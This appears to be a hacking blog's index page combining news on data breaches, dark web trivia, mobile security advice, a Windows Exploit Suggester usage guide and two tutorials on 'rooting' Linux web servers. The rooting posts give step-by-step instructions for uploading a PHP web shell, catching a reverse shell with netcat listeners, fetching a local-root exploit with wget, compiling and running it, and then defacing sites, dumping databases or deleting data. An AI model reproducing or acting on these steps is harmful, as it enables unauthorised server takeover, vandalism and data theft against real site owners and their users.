Trending

December 08, 2018

10 Horrifying Dark Web Facts


Plenty of horrifying stories and myths circulate the internet about the Dark Web, but are they really true? From generally harmless social forums to disturbing criminal activity, the Dark Web has pretty much everything, and it’s all happening right under our noses. It’s difficult to separate fact from fiction, especially when dealing with the seedy underbelly of the internet. However, there’s plenty of things that we do know for sure. For instance, the Deep Web itself is not illegal but some activity on it can be. We’re here to set the record straight, clear a few things up, but also reaffirm the fact that the Dark Web can be a terrifying place. Here are 10 Horrifying Dark Web Facts That Are Actually True

Warning!

Cyberera insists that these information shall not be used for causing any kind of damage directly or indirectly.The site is totally meant for educational purposes only and the author of cyberera is not liable of any illegal act performed by any user.

1.The Dark Web is part of the Deep Web. In simple terms, Deep Web is the part of the internet that isn't cataloged by search engines. The Dark Web specifically is where most of the illegal and disturbing stuff takes place.

2.It should be no surprise that a place called the Dark Web would be full of scams. In one case, however, people kept falling for an elaborate scam to hire hitmen. Called Besa Mafia, the website claimed to offer hitmen services but just wanted large sums of money.

3.While the size of the Surface Web is substantial, it pales in comparison to the size of the Deep Web and Dark Web. Some estimate the Deep Web is about 400 to 500 times larger.

4.Normal currency can't be used on the Dark Web. Users regularly depend on bitcoin and other cryptocurrencies to make market transactions. These are especially popular because they're virtually untraceable.

5.While it may have all kinds of unsavory, illegal, and downright nasty stuff, it also has a big book fan club. One of the founders of the Silk Road, a black market for drugs, also started a book bazaar on it. Though the books they read are mostly conspiracy theory books and banned book

6.Stolen credit cards are often sold on the Dark Web. Other pirates will use stolen credit cards to buy gift cards and then sell them for less than their worth.

7.According to the Israeli intelligence firm Sixgill, criminals were discovered selling fake degrees, certifications, and passports. People also hired out hackers to break into university systems and change grades.

8.Sadly, one of the darkest parts of the Dark Web is human trafficking. Disturbing pictures of people are taken, and these people are sold as property to the highest bidder. Authorities note that the Dark Web is only a small portion of the trafficking that takes place in the world.

9.While not surprising but still alarming, international arms trade has a presence on the Dark Web. The Untied States is the most common source country with 60% of the arms originating from there. Supposedly, you can find everything from an AK-47 to a rocket launcher if you look hard enough.

10.On the Dark Web, you'll be even more susceptible to malware attacks with plenty of links hiding secret malware that'll download to your computer. All it takes is one wrong click to make it happen.



Thank you for visiting Our Website. If you Getting any Problem or have a Question to ask related to this Article then Comment below i will respond to you With in 24 to 48 Hours . We Feel Happy to Help you.

We Hope That You Liked this Article and  Please Share This Article  with your Friends and Family Members Using The Social Networking Icon Below. And Subscribe Your Website’s News Letter For Getting regular Updates Into Your Email Inbox About Latest Hacking Articles.

November 27, 2018

Top 5 Stupid Things People Do With Mobile Phones


Mobile devices get smarter every day, and more of us than ever depend on them. But there is a drawback to our increasing dependence on smart mobile devices—they have the potential to be even more risky than laptop computers. This risk is due to two key factors. First, users tend to be as careful with their mobile devices as they are with their laptops, and second, security solutions (encryption, antivirus, etc.) are not as pervasively deployed on mobile devices as they are on laptop computers. A recent survey from Credant Technologies found that a staggering 94 percent of the IT security professionals surveyed now believe that mobile devices pose more of a security risk to companies than mobile storage devices (88%) or laptops (79%).
To add to that, a recent series of online workshops and surveys conducted by IT research firm Freeform Dynamics, which gathered input from both IT and business professionals, revealed that the attitude of mobile users to security is either poor or variable in 80 percent of organizations. Only one IT security professional in five indicated that users have a consistently good attitude towards mobile security.
A 2007 study commissioned in part by the National Cyber Security Alliance appears to bear out the above. The study was based on interviews with 700 mobile workers in the United States, United Kingdom, Germany, China, India, South Korea, and Singapore. Among the findings:
  • 73 percent of the mobile workers surveyed said they aren't always aware of security threats and best practices when working on the go.
  • Nearly 30 percent of the mobile workers admitted that they "hardly ever" consider security risks and proper preventative behavior.
With an increasing number of smart mobile devices playing an ever more important role in businesses of all types, it is time that we considered some of the "stupid" things people do with their mobile phones—some of which they would never consider doing with their laptops—and what companies can (or cannot) do to protect users from themselves.


#1: Disabling the lock feature on the phone and/or not establishing a password to unlock an idled phone
This is how lost mobiles become dangerous mobiles. Because they are so small and so portable, mobile phones are easier to misplace or steal than laptops. The numbers are staggering. According to a survey commissioned by Pointsec, 85,000 mobile phones and 21,000 PDAs and smartphones were left on taxis in Chicago over a 6-month period in 2007. The survey also found that more than 63,000 mobile phones and 5,800 PDAs and smartphones were left in London taxis during the same 6-month period.






According to the Credent Technologies survey mentioned earlier, even given these types of loss statistics, over half of the supposedly security-conscious respondents (56%) surprisingly confessed to 'not bothering' to use a password every time they used their own mobile device or smartphone. This is the most basic security precaution for mobile devices and often the first line in defense. Billions of dollars are being spent on information security, yet companies are leaving their back doors and windows wide open by allowing uncontrolled mobile device access, risking sabotage, hacking and exploitation. Management software that can remotely lock/wipe high-risk content from lost or stolen mobile phones can protect users from themselves. A more proactive approach is to put in place management software that enables enterprises to establish security policies for their mobile devices and applications—policies like requiring the use of a strong device password for unlocking an idled phone—to ensure consistent protection for all mobile employees.
#2: Keeping information that could compromise company security in "plain sight" on the phone (e.g., keeping server or other passwords in Notes or Contacts, keeping detailed/sensitive information on an unsecured device)
Many of us are starting to use our mobile phones as tiny computers, and are keeping all sorts of data on these devices. According to a survey of global-500 CIOs conducted by Coleman Parkes for Mformation, more than half of companies surveyed reported that technical product, sales and/or customer details are being kept on employees' mobile devices, many of which are personal devices rather than company-issued devices. The same Coleman Parkes survey also found that only 12 percent of enterprises have a full record of the data being stored on their employees' mobile devices.
To make matters worse, this critical company data is being kept on unsecured devices. According to the McAfee 2008 Mobile Security Report, 79 percent of consumers are knowingly using unprotected devices, with another 15 percent unsure of their devices' security levels. All sorts of information is being kept in "plain sight" on mobile devices and could be devastating to an enterprise if it fell into the wrong hands. Consumers, operators and especially enterprises are finding that they need remote management capabilities that can enforce security policies on mobile devices, and keep the data on those devices safe, even when individuals aren't as careful as they should be with it.
#3, Opening an application from an unsecured/unknown source
Without mobile applications and content—from messaging and email to games, business applications, productivity software, educational content, and even health and fitness systems—a mobile device is basically just a phone. Every day, more applications and content are being developed specifically for mobile devices. But not all applications are created equal. Downloading/opening a "bad" &mdash or even just poorly constructed—application can cause all sorts of problems. Users of mobile Web and other mobile applications are very concerned about the lack of protection from "bad" mobile applications and content. In McAfee's 2008 Mobile Security Report, 64 percent of mobile Web users surveyed expressed worry about surfing on the mobile web/downloading content.






Enterprises in particular want to be able to establish and enforce security policies that ensure only authorized applications can be loaded onto employees' devices. They also need to be able to ensure that employees have the correct versions of key applications. Consumers also need quick resolution to any problems they might have as a result of a bad application or service being downloaded.
#4: Using the phone to access dangerous/risky Web sites and Internet locations
Most mobile devices provide Internet access, making it just as easy to access risky Web sites and Internet content on a phone as it is to access this content on a computer. We all know what sort of havoc some Web sites and Internet locations can wreak on a computer—from crashes due to viruses and malware, to unsolicited content that affects performance. This issue is now a problem for mobile phones as well.
According to McAfee's 2008 Mobile Security Report, more than 86 percent of mobile users worry about receiving inappropriate or unsolicited content, getting fraudulent bill increases, or suffering information loss or theft. In addition, one in seven global mobile users report that they have already been exposed to mobile viruses, either directly or through knowing someone whose phone has been infected. Consumers and enterprises alike need to be able to protect themselves from these problems with the ability to block unsolicited content and to recover quickly and completely if a mobile device is infected.


#5: Leaving the device open to access (e.g., leaving Bluetooth or WiFi on, visible and unsecured)
Some of the most prevalent mobile viruses and worms use an unprotected Bluetooth connection to get into mobile devices or to spread to other devices. This includes two of the most common mobile device viruses, both with a number of variants, Cabir and CommWarrior. As yet, there have not been reports of attacks on mobile phones via open WiFi connections, but experts say that with more mobile devices connecting via WiFi, they are susceptible to the same types of attacks as any computer on an at-risk network might be.
In addition, it is possible for external sources to hijack an open, unsecured connection such as Bluetooth or WiFi in order to enter into corporate networks, where they could cause harm to corporate systems or data. One way to minimize the risks these open connections can present to an enterprise is to establish and enforce policies about restricting access to certain mobile device functions, such as WiFi or Bluetooth, under certain circumstances, protecting corporate data and assets from outside attack.
Mobile devices are changing the way we all live, work and play. Most of us wouldn't think of leaving home without our mobile devices, and more of us are using mobile devices—whether they're our personal devices or issued by our employer—for work every day, even if it's just to check our email when we're not in the office. We need to start treating our mobile devices in much the same way as we treat our laptop computers. Implementing security solutions and policies, as well as remote management support for all mobile workers—whether they're using personal or company-issued devices—are big steps in the right direction toward protecting these increasingly powerful devices and the critical data on them. 
....................................................................................................................................
Thank you for visiting Our Website. If you Getting any Problem or have a Question to ask related to this Article then Comment below i will respond to you With in 24 to 48 Hours . We Feel Happy to Help you.
We Hope That You Liked this Article and  Please Share This Article  with your Friends and Family Members Using The Social Networking Icon Below. And Subscribe Your Website’s News Letter For Getting regular Updates Into Your Email Inbox About Latest Hacking Articles.

November 25, 2018

Windows Exploit Suggester - Tool To Detect Potential Missing Patches & Find Exploits


Windows Exploit Suggester is a Python-based tool that compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

When looking at the command output, it is important to note that it assumes all vulnerabilities and then selectively removes them based upon the hotfix data. This can result in many false-positives, and it is key to know what software is actually running on the target host. For example, if there are known IIS exploits it will flag them even if IIS is not running on the target host.

The output shows either public exploits (E), or Metasploit modules (M) as indicated by the character value.

It was heavily inspired by Linux_Exploit_Suggester by Pentura.

USAGE:

Update the database
$ ./windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2014-06-06-mssb.xlsx
[*] done

Install dependencies
(install python-xlrd, $ pip install xlrd --upgrade)

feed it "systeminfo" input, and point it to the Microsoft database

$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1
-systeminfo.txt 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] reading from the systeminfo input file
[*] querying database file for potential vulnerabilities
[*] comparing the 15 hotfix(es) against the 173 potential bulletins(s)
[*] there are now 168 remaining vulns
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of 
Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code 
Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of 
Privilege (2778930) - Important
[*] done

possible exploits for an operating system can be used without hotfix data

$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows 
server 2008 r2' 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] getting OS information from command line text
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 196 potential bulletins(s)
[*] there are now 196 remaining vulns
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of 
Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege 
(2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation 
of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution 
(2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation 
of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege 
(981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical


LIMITATIONS:

Currently, if the 'systeminfo' command reveals 'File 1' as the output for the hotfixes, it will not be able to determine which are installed on the target. If this occurs, the list of hotfixes will need to be retrieved from the target host and passed in using the --hotfixes flag

It currently does not separate 'editions' of the Windows OS such as 'Tablet' or 'Media Center' for example, or different architectures, such as Itanium-based only

False positives also occur where it assumes EVERYTHING is installed on the target Windows operating system. If you receive the 'File 1' output, try executing 'wmic qfe list full' and feed that as input with the --hotfixes flag, along with the 'systeminfo'.

Download WES
..................................................................................................................................................................................................

Thank you for visiting Our Website. If you Getting any Problem or have a Question to ask related to this Article then Comment below i will respond to you With in 24 to 48 Hours . We Feel Happy to Help you.

We Hope That You Liked this Article and  Please Share This Article  with your Friends and Family Members Using The Social Networking Icon Below. And Subscribe Your Website’s News Letter For Getting regular Updates Into Your Email Inbox About Latest Hacking Articles.
November 16, 2018

Hacking a Web Server : Rooting A Linux Server


Hacking a Web Server : Rooting A Linux Server

This is the second article in server hacking series. I hope you guys enjoyed last articles. If you are new to this series I suggest you read last  articles. In this article, we will try to root the server.

I hope you know about root user on Linux server. For those who don't know what root is, Root is a super user on Linux server which has all the permission to all files and functions in the server.


THINGS WE NEED

  • A Linux Hacking Distro.
  • A vulnerable server.


    IDENTIFYING THE KERNEL VERSION

    • This is the first step of rooting the server.
    • In this step, we try to find out the kernel version and year.
    • To do that you have to visit your PHP web shell and look at uname. 

    • In my example, uname shows Kernal version 3.13.0-32 and year is 2014.
    • In you are using tools like Weevely, you have to type uname -a to get the kernel version and year.


    FINDING EXPLOIT FOR KERNEL

    • After finding the kernel version, we need to find exploit for this kernel. 
    • We will use Exploit-DB to find the kernel exploit.
    • Just open Exploit-db.com and click on search and enter the version number.
    • Now open any exploit available for that kernel.
    • Download the exploit code. 


    ROOTING THE SERVER

    • After downloading the exploit, upload the exploit to the server using upload function in PHP web shell.
    • Now we have to use Netcat to create a connection between our computer and the server PHP shell.
    • Open terminal and type the following commands and leave the terminal open. 
     nc -n -l -v -p 31337


    •  In this step, we are going to connect our PHP web shell to the Netcat using back connect option in our PHP web shell.
    • After successful connection, we will get a command shell on the server or we can say terminal interface on the server.
    • Now we have to change the directory where the kernel exploit is uploaded.
    • After that, we type the following commands to compile the exploit. Here exp.c is exploit file and exp is output file.
     gcc exp.c -o exp

    •  After compiling the exploit, now we have to run it.Type the following commands to run the exploit.
     ./exp


    • After running the exploit, you can check the root status using "id" command.

    Thank you for visiting Our Website. If you Getting any Problem or have a Question to ask related to this Article then Comment below i will respond to you With in 24 to 48 Hours . We Feel Happy to Help you.

    We Hope That You Liked this Article and  Please Share This Article  with your Friends and Family Members Using The Social Networking Icon Below. And Subscribe Your Website’s News Letter For Getting regular Updates Into Your Email Inbox About Latest Hacking Articles.
    November 06, 2018

    HOW TO ROOT A SERVER? – SERVER ROOTING


    Servers serve the requests made by the users to the webpages, it acts as a helping hand who serves the requested meal to you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with server like delete and copy anything on server, can deface all the websites (massive deface ).
    We can’t talk about root on windows. That enough for beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to got root.

    HOW TO ROOT A SERVER?

    There are 3 ways to get ROOT on server :
    1 – With local Root.
    2 – With SQL by reading same important files on it root password.
    3 – With exploit on software (Buffer Overflow).
    In this post, we will explain local Root. I will explain the other ways soon in some other post.
    OK, let’s back to work.
    After Uploading your shell on server and getting the localroot you will do a back connect and run the localroot to Get root . This is a small idea how it work in the next step you will see how to
    find localroot and run it to get root access .

    HOW TO SEARCH LOCAL ROOT?

    First of all we you need to know what version of Kernel.
    You can know that from your shell, for example this version is 2.6.18 – 2012


    Go to EXECUTE on your shell and write  “uname -a”. You will get the same result, by the way.
    Now how to find the local root.
    You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exists two types of local roots :
    1. Local.C : which are not ready.
    2. Local : ready to use.

    HOW TO GET ROOT ACCESS?

    First you need a shell with a Back Connect option like this :

    Enter your “Public IP Address” in SERVER, port you want to connect on and leave it Perl this time, and Finally connect.
    So now you must receive the back connect with a Tool named netcat u can download it from the
    net. After that open your terminal if you are under linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
    After that Follow the steps :
    1- Press nc -vlp 433
    2- Wget [the link of the local-Root.zip]
    3 – unzip local-Root.zip

    4 – chmod 777 local.c

    5 – now to change the local-root from local.c > local

    gcc local.c -o local Then you will find local.c transformed to local

    6 – chmod 777 local

    7 – ./local to local root work

    8 – su

    then see your id uid=0(root) gid=0(root) groups=0(root)


    Getting UID=0 means, u had got root priviledges and hence can do variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
    AFTER THE ROOT 
    As server gets rooted, you’re able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.


    Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.

    .................................................................................................................................................


    Thank you for visiting Our Website. If you Getting any Problem or have a Question to ask related to this Article then Comment below i will respond to you With in 24 to 48 Hours . We Feel Happy to Help you.

    We Hope That You Liked this Article and  Please Share This Article  with your Friends and Family Members Using The Social Networking Icon Below. And Subscribe Your Website’s News Letter For Getting regular Updates Into Your Email Inbox About Latest Hacking Articles.
    November 06, 2018

    HACKERS CLAIMS TO HAVE ACCESS TO OVER 81,000 FACEBOOK ACCOUNT

    HACKERS CLAIMS TO HAVE ACCESS TO OVER 81,000 FACEBOOK ACCOUNTS


    Hackers claim to have hack account of over 81,000 Facebook users. However, Facebook insists its users haven’t been attacked or their network compromised.
    There are indications that cybercriminals may have compromised and published private messages from over 81,000 Facebook accounts. The attackers informed the BBC Russian Service that it had the details of 120 million accounts, which they were planning to sell. However, there are reasons to be skeptical about the figures posted by these hackers. In a swift reaction, Facebook said its security hasn’t been breached and the data may have been gotten through malicious browser extensions.
    Facebook further indicated that the necessary steps have been taken to prevent any further hack. However, the BBC acknowledged that most of the users whose details were compromised are based in Russia, Ukraine, Brazil, the UK, the US, and other areas.
    The hackers have offered to sell access to each account for 10 cents. Nevertheless, the advert used for this purpose has been taken offline. According to Facebook executive Guy Rosen,
    “We have contacted browser-makers to ensure that known malicious extensions are no longer available to download in their stores. We have also contacted law enforcement and have worked with local authorities to remove the website that displayed information from Facebook accounts.”
    The breach was first noticed in September when a post from a user with a nickname “FBSaler” appeared on an internet forum. The user wrote that they deal in personal information for Facebook users with 120 million accounts up for sales. Digital Shadows, a cyber-security company further examined the claims by this user on behalf of BBC. Digital Shadows confirmed over 81,000 profiles posted online as a sample of compromised private messages. Furthermore, data from additional 176,000 accounts were made available online. The BBC Russian Service on its part contacted five Russian Facebook users whose private messages were uploaded and they confirmed the posts were theirs.

    Who should take the blame?

    Bookmarking applications, mini-puzzle games, and personal shopping assistants are some of the offers you will see from different browsers including Firefox, Opera, and Chrome as third-party extensions. The icon that gives access to the hackers to your account normally sits alongside your URL address bar waiting for you to click it.
    Facebook said it is this one of this extension that monitors the activities of victims on the platform before sending private conversations and personal details back to the hackers. Though Facebook hasn’t named the particular extension, there are indications that it will not accept that the leak was its fault.
    Independent cyber experts express that if the extension was the reason for this hack, then the developers of these browsers have a huge responsibility to share regarding their failure to vet the programs before distributing it to the marketplace. Notwithstanding this, the hack isn’t a good news for Facebook.
    Earlier last year, Facebook experienced a terrible data security breach and many are questioning if the network has the ability to respond to this situation considering the number of people affected. The BBC Russian Service sent a mail along with the hacked details to the advertiser if the breached accounts were related to those involved in the Cambridge Analytical scandal or the ones revealed on the September security breach.
    A reply from username “John Smith” indicated that this latest information is unconnected to the previous incidents. He further claimed that the group has 120 million users data to sell with 2.7 million belong to Russians. However, Digital Shadows informed BBC that it was doubtful of the claims made by this hacking group.
    ...............................................................................................................................................
    Thank you for visiting Our Website. If you Getting any Problem or have a Question to ask related to this Article then Comment below i will respond to you With in 24 to 48 Hours . We Feel Happy to Help you.
    We Hope That You Liked this Article and  Please Share This Article  with your Friends and Family Members Using The Social Networking Icon Below. And Subscribe Your Website’s News Letter For Getting regular Updates Into Your Email Inbox About Latest Hacking Articles.

    October 23, 2018

    Healthcare.gov system hacked, data o 75,000 customers reveale

    Healthcare.gov system hacked, data o 75,000 customers revealed

    Hackers compromised the computer system that interacts with the HealthCare website, HealthCare.gov, used by insurance agents to directly enrol the customers for the insurance plan, said officials at the Centers for Medicare & Medicaid Services (CMS). Approximately 75,000 people personal data were accessed by the hackers.

    The open enrollment period to sign up for a health plan under the Affordable Care Act started on October 20 and runs until December 15.

    The Federally Facilitated Exchange’s Direct Enrollment pathway, which is used by agents and brokers to help customers enrol in health insurance, was compromised between October 13 and 16.

    Customers applying for healthcare plans should provide details such as names, addresses, social security number, citizenship, and income details. CMS did not provide any details on what kind of data stolen by hackers.

    In a statement to CNN, CMS said the system that was exposed through the hack was the Direct Enrollment pathway, which allows agents and brokers to assist consumers with applications for coverage in the Federally Facilitated Exchanges, or FFE. The statement detailed that the agent and broker accounts that were associated with the hack were "deactivated, and -- out of an abundance of caution -- the Direct Enrollment pathway for agents and brokers was disabled." Both HealthCare.gov and the Marketplace Call Center remain in operation.

    “Our number one priority is the safety and security of the Americans we serve. We will continue to work around the clock to help those potentially impacted and ensure the protection of consumer information,” said CMS Administrator Seema Verma.

    "We are working to get this functionality that exchanges agents and brokers use back up within seven days," a representative for CMS told CNN. When asked if the source of the hacking had been identified and if the system was in a good place ahead of the sign-up season beginning in November for coverage under the Affordable Care Act, the representative could not answer due to it being an active federal law enforcement investigation.


    Thank you for visiting Our Website. If you Getting any Problem or have a Question to ask related to this Article then Comment below i will respond to you With in 24 to 48 Hours . We Feel Happy to Help you.


    We Hope That You Liked this Article and  Please Share This Article  with your Friends and Family Members Using The Social Networking Icon Below. And Subscribe Your Website’s News Letter For Getting regular Updates Into Your Email Inbox About Latest Hacking Articles.